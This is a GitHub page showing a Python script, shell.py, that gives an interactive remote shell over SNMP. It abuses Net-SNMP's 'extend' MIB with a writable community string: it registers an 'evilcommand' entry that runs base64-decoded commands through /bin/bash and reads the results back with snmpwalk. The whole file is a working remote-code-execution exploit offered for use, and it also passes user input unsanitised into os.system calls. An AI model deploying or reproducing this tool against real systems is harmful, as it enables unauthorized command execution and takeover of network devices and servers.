-
-
Notifications
You must be signed in to change notification settings - Fork 19
/
shell.py
96 lines (86 loc) · 3.09 KB
/
shell.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
from termcolor import colored
import os
import re
import base64
import click
# Click config
CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
delimiters = {"start": """NET-SNMP-EXTEND-MIB::nsExtendOutputFull."evilcommand" = STRING: """,
"end": """NET-SNMP-EXTEND-MIB::nsExtendOutNumLines"""}
reg = """\]LEDEBUT\]([\s\S]*)\]LAFIN\]"""
@click.command(context_settings=CONTEXT_SETTINGS)
@click.argument('ip')
@click.option(
'--communitystring', '-c',
help='Community string for SNMP',
default="private"
)
@click.option(
'--version', '-v',
help='SNMP version (1/2c/3)',
default="2c"
)
@click.option(
'--snmpset', '-ss',
help='Path for the snmpset binary',
default="/usr/bin/snmpset"
)
@click.option(
'--snmpwalk', '-sw',
help='Path for the snmpwalk binary',
default="/usr/bin/snmpwalk"
)
def run(ip, communitystring, version, snmpset, snmpwalk):
"""Simulates a terminal over Net-SNMP \"extend\" functionality.
Be sure your SNMP Community String has write access."""
com_str = communitystring
def process(cmd):
cmd = base64.b64encode(cmd.encode()).decode()
os.system("""{} -m +NET-SNMP-EXTEND-MIB -v {} -c {} {} 'nsExtendStatus."evilcommand"' = destroy > /dev/null""".format(snmpset, version, com_str, ip))
os.system("""{} -m +NET-SNMP-EXTEND-MIB -v {} -c {} {} 'nsExtendStatus."evilcommand"' = createAndGo 'nsExtendCommand."evilcommand"' = /bin/bash 'nsExtendArgs."evilcommand"' = "-c \\\"echo {} | base64 -d | sh\\\"" > /dev/null""".format(snmpset, version, com_str, ip, cmd))
output = os.system("""{} -v {} -c {} {} NET-SNMP-EXTEND-MIB::nsExtendOutputFull > /tmp/snmprce""".format(snmpwalk, version, com_str, ip))
with open('/tmp/snmprce', 'r') as file:
final = ""
flag = False
for line in file.readlines():
if delimiters["start"] in line:
flag = True
final += line.replace(delimiters["start"], '')
continue
elif flag:
if delimiters["end"] in line:
break
else:
final += line
return final
try:
output = process("echo -n ]LEDEBUT]$(whoami)[$(hostname)[$(pwd)]LAFIN]")
prefixes = re.compile(reg).findall(output)[0].split("[")
path = prefixes[2]
prefix = colored(prefixes[0] + "@" + prefixes[1], "red") + ":" + colored(prefixes[2], "cyan") + "$ "
print("")
except IndexError:
print("Error.\nBe sure your SNMP Community String has write access & your NET-SNMP target has \"extend\" functionality.")
exit()
try:
while 1:
text = input(prefix)
if not text.strip():
continue
cmd = text.strip()
cmd = "echo -n ']LEDEBUT]' ; cd {} && ".format(path) + cmd + " 2>&1 ; echo $(whoami)[$(hostname)[$(pwd) ; echo ']LAFIN]'"
output = process(cmd)
try:
output = re.compile(reg).findall(output)[0].split('\n')
prefixes = output.pop(len(output) - 2).split("[")
path = prefixes[2]
prefix = colored(prefixes[0] + "@" + prefixes[1], "red") + ":" + colored(prefixes[2], "cyan") + "$ "
output = "\n".join(output)
print(output)
except IndexError:
print("Error.\n")
except KeyboardInterrupt:
print(colored("\nGoodbye !", "cyan"))
exit()
if __name__ == '__main__':
run()